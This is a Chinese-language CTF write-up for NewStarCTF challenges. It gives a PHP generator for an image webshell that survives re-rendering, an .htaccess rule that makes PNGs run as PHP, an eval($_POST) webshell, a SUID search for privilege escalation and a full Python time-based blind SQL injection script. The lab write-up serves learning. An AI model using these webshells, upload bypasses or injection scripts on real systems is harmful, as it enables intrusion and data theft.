进去后看内容
看这个文字意思应该是考的二次渲染
贴个利用代码
制作二次渲染后不会被修改的图片马
其实还可以自己比对哪块地方被修改了,然后插到没被修改的里面就行
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'./1.png');
?>
http://1259b0a2-331e-4b4a-8335-f7278c7154b7.node4.buuoj.cn:81/upload/1.png
上传上去后,然后想了想 穿个.htaccess吧
内容是
AddType application/x-httpd-php .png
然后就可以了
挺感动的
apache搜到一个cve 2021 42013
调用cgi然后执行系统命令
<?php
error_reporting(0);
if(isset($_GET["cmd"])){
if(preg_match('/bash|curl/i',$_GET["cmd"])){
echo "Hacker!";
}else{
shell_exec($_GET["cmd"]);
}
}else{
show_source(__FILE__);
}
题目给出的代码
shell_exec没有回显 禁了curl和反弹shell 我当时看了看感觉有点2
我为啥不直接重新写一个shell0.0
echo ‘<?php eval($_POST[a]);?>’ > 2.php
没有权限提个权
先找找有root权限的命令
find /bin -perm -u=s -type f 2>/dev/null
有个date直接用
我一开始是想慢慢拆解的,可以看week3的那篇博客但是 我payload直接就打进去了,用的就是之前的payload
空格被禁了用${IFS}绕过
payload:
简单测试了一下发现可以盲注
直接贴我当时写的脚本吧
跑的时候是凭感觉了 感觉最后应该是flag放在最后面于是就reverse去读了
还真是这样逆一下就行了
import requests
import time
url='http://adfa764a-76cf-4c94-837c-dd43a80935b6.node4.buuoj.cn:81/comments.php'
def baoku():
res = ''
for i in range(1, 100):
left = 32
right = 128
mid = (left + right) // 2
while (left < right):
payload = {
'name':'3123||if(ascii(substr(database(),%d,1))<%d,sleep(0.3),0)'%(i,mid)
}
times=time.time()
t = requests.post(url,data=payload)
timee=time.time()
keep=timee-times
time.sleep(0.2)
if keep>3:
right = mid
else:
left = mid + 1
mid = (left + right) // 2
if mid <= 32 or mid >= 127:
break
res += chr(mid - 1)
print(res)
def baobiao():
res = ''
for i in range(1, 100):
left = 32
right = 128
mid = (left + right) // 2
while (left < right):
payload = {
'name': '3123||if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d,sleep(0.3),0)' % (i, mid)
}
print(payload)
times = time.time()
t = requests.post(url, data=payload)
timee = time.time()
keep = timee - times
time.sleep(0.2)
if keep > 3:
right = mid
else:
left = mid + 1
mid = (left + right) // 2
if mid <= 32 or mid >= 127:
break
res += chr(mid - 1)
print(res)
def baoduan():
res = ''
for i in range(1, 100):
left = 32
right = 128
mid = (left + right) // 2
while (left < right):
payload = {
'name': '3123||if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="wfy_information")),%d,1))<%d,sleep(0.1),0)' % (i, mid)
}
print(payload)
times = time.time()
t = requests.post(url, data=payload)
timee = time.time()
keep = timee - times
time.sleep(0.2)
if keep > 1:
right = mid
else:
left = mid + 1
mid = (left + right) // 2
if mid <= 32 or mid >= 127:
break
res += chr(mid - 1)
print(res)
def baozhi():
res = ''
for i in range(1, 100):
left = 32
right = 128
mid = (left + right) // 2
while (left < right):
payload = {
'name': '3123||if(ascii(substr((select(reverse(group_concat(text)))from(wfy_comments)),%d,1))<%d,sleep(0.2),0)' % (i, mid)
}
print(payload)
times = time.time()
t = requests.post(url, data=payload)
timee = time.time()
keep = timee - times
time.sleep(0.2)
if keep > 2:
right = mid
else:
left = mid + 1
mid = (left + right) // 2
if mid <= 32 or mid >= 127:
break
res += chr(mid - 1)
print(res)
baozhi()
其实写的有点冗余了,但是我都这么写了因为懒得删0.0
然后得到后
flag[::-1]就可以啦
题目质量可以也是比较符合NewStarCTF 祝各位安全学习者从业者能在接下来的道路上一帆风顺!!
(高兴一下哈哈最后排名结算是30多名这个比赛感觉还挺好,主要本来还想练一下misc的但是都忘记写misc的题了不然感觉应该排名还能冲一冲)